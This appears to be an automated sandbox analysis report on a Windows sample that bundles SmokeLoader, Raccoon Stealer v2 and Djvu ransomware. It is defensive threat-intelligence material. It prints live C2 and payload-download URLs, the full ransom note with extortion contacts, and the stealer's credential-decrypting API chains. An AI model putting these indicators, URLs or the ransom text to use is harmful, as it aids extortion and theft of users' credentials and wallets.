Windows Analysis Report
5tLwjRFzAW.exe

Overview

General Information

Sample Name: 5tLwjRFzAW.exe
Analysis ID: 682150
MD5: 203eaeca3c89f5ca7dc82668c4883b5a
SHA1: 0d872229972ec1e3ea8173343a715b4a2fcb5855
SHA256: c4624241f0890dada47236f267303691f82bbbd28eed1a379a498bd3009cb734
Tags: exeFormbook
Infos:

Detection

CryptOne, Djvu, Raccoon Stealer v2, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Tries to steal Crypto Currency Wallets
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Extensive use of GetProcAddress (often used to hide API calls)
Uses cacls to modify the permissions of files
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://limo00ruling.org/ URL Reputation: Label: malware
Source: http://acacaca.org/lancer/get.php Avira URL Cloud: Label: malware
Source: http://85.192.63.46/f/1.exe Avira URL Cloud: Label: malware
Source: http://susuerulianita1.net/ URL Reputation: Label: malware
Source: http://linislominyt11.at/ URL Reputation: Label: malware
Source: http://62.204.41.178/newfile.exe Avira URL Cloud: Label: malware
Source: http://nikogminut88.at/ URL Reputation: Label: malware
Source: http://acacaca.org/lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\E69F.exe Avira: detection malicious, Label: TR/AD.RaccoonSteal.muash
Source: C:\Users\user\AppData\Local\Temp\D0E3.dll Avira: detection malicious, Label: HEUR/AGEN.1233360
Multi AV Scanner detection for domain / URL
Source: monsutiur4.com Virustotal: Detection: 18% Perma Link
Source: rgyui.top Virustotal: Detection: 21% Perma Link
Source: linislominyt11.at Virustotal: Detection: 15% Perma Link
Source: acacaca.org Virustotal: Detection: 18% Perma Link
Source: moroitomo4.net Virustotal: Detection: 14% Perma Link
Source: cucumbetuturel4.com Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\33.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\A658.exe Metadefender: Detection: 47% Perma Link
Source: C:\Users\user\AppData\Local\Temp\A658.exe ReversingLabs: Detection: 56%
Machine Learning detection for sample
Source: 5tLwjRFzAW.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\irbiwat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A658.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D0E3.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 31.2.regsvr32.exe.4cd0184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://susuerulianita1.net/", "http://nikogminut88.at/", "http://cucumbetuturel4.com/", "http://lilisjjoer44.com/", "http://mini55tunul.com/", "http://limo00ruling.org/"]}
Source: 27.2.A658.exe.23415a0.1.raw.unpack Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-HZpuxNJt6L\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0539Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree, 20_2_00403236
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004027B8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree, 20_2_004027B8
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 20_2_00402CB8
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree, 20_2_00406468
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 20_2_004017FA
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040177F CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree, 20_2_0040177F

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Unpacked PE file: 20.2.28E9.exe.400000.0.unpack
Uses 32bit PE files
Source: 5tLwjRFzAW.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49822 version: TLS 1.2
Source: Binary string: C:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: freebl3.dll.20.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.20.dr
Source: Binary string: C:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
Source: Binary string: FC:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.20.dr
Source: Binary string: ZC:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: nss3.dll.20.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.20.dr
Source: Binary string: \Downloads\Documents\f3iwnx51rxg\output.pdb source: 33.exe.4.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.20.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.20.dr
Source: Binary string: C:\jid.pdb source: 5tLwjRFzAW.exe, irbiwat.4.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.20.dr
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_0040ABD8
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose, 20_2_004052DA
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose, 20_2_00405B5B
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW, 20_2_0040196E
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose, 20_2_0040B177
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose, 20_2_00401B05
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose, 20_2_0040AE06
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_00403C8F
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_00401E18
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW, 20_2_0040633E
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 20_2_004039D7
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree, 20_2_00406725
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0043A390 FindFirstFileW, 20_2_0043A390
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0043A448 FindFirstFileW, 20_2_0043A448

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cucumbetuturel4.com
Source: C:\Windows\explorer.exe Domain query: susuerulianita1.net
Source: C:\Windows\explorer.exe Domain query: linislominyt11.at
Source: C:\Windows\explorer.exe Domain query: moroitomo4.net
Source: C:\Windows\explorer.exe Domain query: monsutiur4.com
Source: C:\Windows\explorer.exe Domain query: nusurionuy5ff.at
Source: C:\Windows\explorer.exe Domain query: nunuslushau.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.3:49759 -> 45.138.74.104:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 45.138.74.104:80 -> 192.168.2.3:49759
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://acacaca.org/lancer/get.php
Source: Malware configuration extractor URLs: http://susuerulianita1.net/
Source: Malware configuration extractor URLs: http://nikogminut88.at/
Source: Malware configuration extractor URLs: http://cucumbetuturel4.com/
Source: Malware configuration extractor URLs: http://lilisjjoer44.com/
Source: Malware configuration extractor URLs: http://mini55tunul.com/
Source: Malware configuration extractor URLs: http://limo00ruling.org/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:11 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:14 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 